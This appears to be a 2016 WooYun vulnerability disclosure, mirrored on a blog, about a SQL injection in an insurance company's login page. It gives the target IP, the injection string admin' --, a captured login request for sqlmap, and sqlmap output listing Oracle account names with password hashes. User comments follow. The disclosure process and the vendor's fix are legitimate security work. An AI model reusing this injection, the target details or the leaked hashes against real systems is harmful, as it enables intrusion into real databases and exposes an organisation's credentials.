中银保险某系统一处SQL注入漏洞(DBA权限26库)

admin

139897
文章

114
评论

2017年5月2日09:49:48评论533 views字数 251阅读0分50秒阅读模式

摘要

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-11：厂商已经确认，细节仅向厂商公开
2016-03-16：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-182953

漏洞标题：中银保险某系统一处SQL注入漏洞(DBA权限26库)

漏洞作者：暴走

提交时间： 2016-03-10 17:17

修复时间： 2016-03-16 11:29

公开时间： 2016-03-16 11:29

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：第三方不可信程序 +DBA权限 SQL注入+

1人收藏

漏洞详情

披露状态：

2016-03-10：细节已通知厂商并且等待厂商处理中
2016-03-11：厂商已经确认，细节仅向厂商公开
2016-03-16：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

点到为止吧，第三方软件不可靠啊。

详细说明：

今天在首页浏览漏洞，发现了公开了“ WooYun: 中银保险车险某系统后台弱口令导致Getshell（涉及车险信息） ”漏洞，于是就看了下，发现该漏洞描存在的情况已经不存在了，提交到公开就3天，处理速度还蛮快的..

漏洞证明：

于是就继续测试了下：http://219.143.241.24:8001/aqqx/

试了下弱密码之类的没试出来，就知道用户名是admin，该系统用户名输入正确，密码输入错误时，提示“密码错误”，算是个小问题吧，系统也没验证码，可尝试暴力破解。

由于我的网速不给力就放弃了，可是发现了登录用户名username存在注入。

用户名输入：admin' --

密码随意

点击登录后，系统没报错，而是跳转到如下页面：

于是对登录进行抓包，使用SQLMAP测试下username

code 区域

POST /aqqx/LoginServlet HTTP/1.1
 Host: 219.143.241.24:8001
 Proxy-Connection: keep-alive
 Content-Length: 32
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://219.143.241.24:8001
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://219.143.241.24:8001/aqqx/
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
 Cookie: JSESSIONID=71MCWgLN5YVcd2C8TKV1vctpbRf2FjwHQmkGjmGFLzzHBDD772Cg!-1792212123
 
 username=admin&password=11111111

测试结果如下：

dba权限的

基于时间的盲注跑数据太慢了，就点到位为止吧：

26库：

current-db：

current-user --password：

code 区域

web application technology: Servlet 2.4, JSP, JSP 2.0
 back-end DBMS: Oracle
 current user:    'AQQX_BD'
 database management system users password hashes:
 [*] ANONYMOUS [1]:
     password hash: anonymous
 [*] AQQX_BD [1]:
     password hash: 5A9828B458AEF00D
 [*] AQQX_CS [1]:
     password hash: A79F29192DF10DA1
 [*] CTXSYS [1]:
     password hash: 71E687F036AD56E5
 [*] DBSNMP [1]:
     password hash: FFF45BB2C0C327EC
 [*] DIP [1]:
     password hash: CE4A36B8E06CA59C
 [*] DMSYS [1]:
     password hash: BFBA5A553FD9E28A
 [*] EXFSYS [1]:
     password hash: 66F4EF5650C20355
 [*] FOGLIGHT [1]:
     password hash: 16CE1767CEAE6835
 [*] JYQUERY [1]:
     password hash: DD08F28B8108C411
 [*] MDDATA [1]:
     password hash: DF02A496267DEE66
 [*] MDSYS [1]:
     password hash: 72979A94BAD2AF80
 [*] MGMT_VIEW [1]:
     password hash: ACC69AC5E5C7872C
 [*] OLAPSYS [1]:
     password hash: 3FB8EF9DB538647C
 [*] ORDPLUGINS [1]:
     password hash: 88A2B2C183431F00
 [*] ORDSYS [1]:
     password hash: 7EFA02EC7EA6B86F
 [*] OUTLN [1]:
     password hash: 4A3BA55E08595C81
 [*] PJBJ_BD [1]:
     password hash: 70A26E4027F00ABC
 [*] PJBJ_CS [1]:
     password hash: 74FFFD9EF5E8D3D1
 [*] pjbj_j y_2 [1]:
     password hash: FC34EA976A65473E
 [*] PJBJ_JY [1]:
     password hash: 083AA3AFB062C335
 [*] PJBJ_JY2 [1]:
     password hash: 462CDA5C451BB9FE
 [*] PJBJ_JY_1 [1]:
     password hash: 253C932F57789AF1
 [*] PJBJ_KF [1]:
     password hash: 91D956975D9D528F
 [*] PJBJ_QY [1]:
     password hash: 8FA2BDED924141F5
 [*] PJBJ_YS [1]:
     password hash: 26F301A33A63075F
 [*] SCOTT [1]:
     password hash: F894844C34402B67
 [*] SI_INFORMTN_SCHEMA [1]:
     password hash: 84B8CBCA4D477FA3
 [*] SYS [1]:
     password hash: 4B944C7BE803D6C8
 [*] SYSMAN [1]:
     password hash: 1DEA5CF775BB128B
 [*] SYSTEM [1]:
     password hash: 11560E4C486B25F8
 [*] TSMSYS [1]:
     password hash: 3DF26A8B17D0F29F
 [*] WMSYS [1]:
     password hash: 7C9BA362F8314299
 [*] XDB [1]:
     password hash: 88D8364765FCE6AF
 [*] ZHENGCHE [1]:
     password hash: FFA856E41B9397D0

当前数据库包含18表：

AQQX_CS数据库：

数据我就不给你们跑了。

修复方案：

能给个高分吗..

版权声明：转载请注明来源暴走@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-03-11 08:27

厂商回复：

非常感谢，我们将尽快修复系统。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-03-10 19:54 | 中银保险有限公司(乌云厂商)

3

非常感谢您，高手啊。给您一个小礼物，以表感谢。

1# 回复此人
2016-03-10 20:32 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

2

@中银保险有限公司都是第三方的软件惹的祸啊，不过我很感兴趣是什么礼物...

2# 回复此人
2016-03-16 14:08 | 老实先生 ( 普通白帽子 | Rank:228 漏洞数:75 | 专业承揽工程刮大白，外墙涂料，外墙保温，...)

1

@暴走 oracle + DBA怎么搞？

3# 回复此人
2016-03-16 15:20 | 浮世浮城 ( 普通白帽子 | Rank:825 漏洞数:146 | 我存于这俗世烟火的浮世，我爱这时光倒影的...)

1

@暴走炫酷手套+精品囚衣

4# 回复此人
2016-03-16 15:26 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

1

@浮世浮城别吓我...!

5# 回复此人
2016-03-16 16:30 | sql小神 ( 实习白帽子 | Rank:56 漏洞数:13 | 有些漏洞可以提，有些漏洞不可以提。)

1

@浮世浮城评论亮了

6# 回复此人
2016-03-16 16:35 | nansss ( 普通白帽子 | Rank:108 漏洞数:27 | 流浪者)

1

金融行业安全相对做的比较好的了，注入还是很多

7# 回复此人
2016-03-16 18:21 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

1

@暴走炫酷手套+精品囚衣

8# 回复此人
2016-03-17 09:42 | 浮世浮城 ( 普通白帽子 | Rank:825 漏洞数:146 | 我存于这俗世烟火的浮世，我爱这时光倒影的...)

1

@sql小神 @暴走不好意思打错了应该是炫酷手铐+精品囚衣

9# 回复此人
2016-03-17 14:57 | 来打我呀 ( 路人 | Rank:2 漏洞数:1 | 欢脱跳跃的小鲜肉~)

1

10# 回复此人
2016-03-22 21:47 | 平底斜 ( 普通白帽子 | Rank:126 漏洞数:30 | 性骄奢，好声色，为文有汉魏风)

1

注册账号送1000元现金，到期后本金收回，利息归你

11# 回复此人

漏洞概要 关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-182953

漏洞标题： 中银保险某系统一处SQL注入漏洞(DBA权限26库)

相关厂商： 中银保险有限公司

漏洞作者： 暴走